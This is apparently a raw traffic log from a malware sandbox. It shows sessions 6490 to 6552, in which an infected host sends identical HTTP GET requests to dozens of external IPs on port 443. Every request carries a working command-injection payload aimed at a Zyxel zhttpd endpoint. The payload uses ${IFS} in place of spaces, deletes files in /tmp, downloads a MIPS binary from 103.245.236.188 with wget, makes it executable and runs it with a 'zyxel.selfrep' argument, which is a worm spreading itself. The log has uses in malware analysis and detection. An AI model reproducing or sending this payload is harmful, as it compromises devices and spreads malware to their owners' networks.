                                                Jan 12, 2024 18:24:44.059933901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6490192.168.2.1348640209.78.67.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.059968948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6491192.168.2.1336674210.206.239.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060005903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6492192.168.2.133802684.7.112.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060056925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6493192.168.2.1349612168.46.81.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060092926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6494192.168.2.1360670158.244.61.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060115099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6495192.168.2.1335508140.40.178.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060167074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6496192.168.2.133709891.191.68.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060220003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6497192.168.2.1354060183.33.157.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060234070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6498192.168.2.1342486223.136.37.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060286045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6499192.168.2.1347292107.4.7.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060322046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6500192.168.2.1360018135.104.220.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060369015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6501192.168.2.1360628190.241.95.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060410023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6502192.168.2.1343392102.186.2.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060445070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6503192.168.2.134594491.129.105.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060497046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6504192.168.2.135242685.101.57.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060550928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6505192.168.2.1336414103.131.173.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060570955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6506192.168.2.134078867.42.71.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060616970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6507192.168.2.134006477.184.174.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060642958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6508192.168.2.133907012.18.147.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060678005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6509192.168.2.135327086.164.43.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060719967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6510192.168.2.134078694.171.68.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060745955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6511192.168.2.1352286124.199.97.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060777903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6512192.168.2.1348406129.127.203.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060818911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6513192.168.2.1360942123.202.118.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060864925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6514192.168.2.1352978165.125.22.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060919046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6515192.168.2.133771445.113.88.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060941935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6516192.168.2.1353014212.151.205.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.060997009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6517192.168.2.13609189.240.164.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061037064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6518192.168.2.1333786149.183.158.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061068058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6519192.168.2.1336618122.197.0.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061111927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6520192.168.2.134571892.84.216.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061153889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6521192.168.2.133808413.250.188.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061191082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6522192.168.2.1344414193.64.20.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061225891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6523192.168.2.1355574189.86.185.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061245918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6524192.168.2.1340958156.38.64.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061279058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6525192.168.2.135898860.99.163.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061309099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6526192.168.2.134212841.194.44.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061351061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6527192.168.2.135482458.30.70.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061400890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6528192.168.2.1339582140.150.3.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061425924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6529192.168.2.1347318217.217.215.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061485052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6530192.168.2.1357828159.213.135.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061521053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6531192.168.2.134634623.6.124.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061563015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6532192.168.2.1338178128.161.166.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061610937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6533192.168.2.135210669.212.35.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061655045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6534192.168.2.135722893.85.17.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061671972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6535192.168.2.1336648125.42.142.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061728001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6536192.168.2.1357846177.173.222.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061762094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6537192.168.2.1349078212.150.80.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061813116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6538192.168.2.133831231.236.142.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061840057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6539192.168.2.1348478101.38.141.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061865091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6540192.168.2.136071685.172.145.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061896086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6541192.168.2.1340596194.222.77.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061937094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6542192.168.2.1345320185.244.63.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061979055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6543192.168.2.1360778191.39.144.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.061999083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6544192.168.2.1346274168.196.132.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.062027931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6545192.168.2.134178435.93.121.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.062081099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6546192.168.2.1343470106.129.249.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.062114000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6547192.168.2.135335450.29.179.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.062143087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6548192.168.2.1334816169.84.191.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.062201023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6549192.168.2.135035881.202.94.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.062241077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6550192.168.2.1334694109.95.132.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.062283039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6551192.168.2.1335344123.5.229.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.062306881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6552192.168.2.1343422172.182.115.104443
                                                TimestampBytes transferredDirectionData
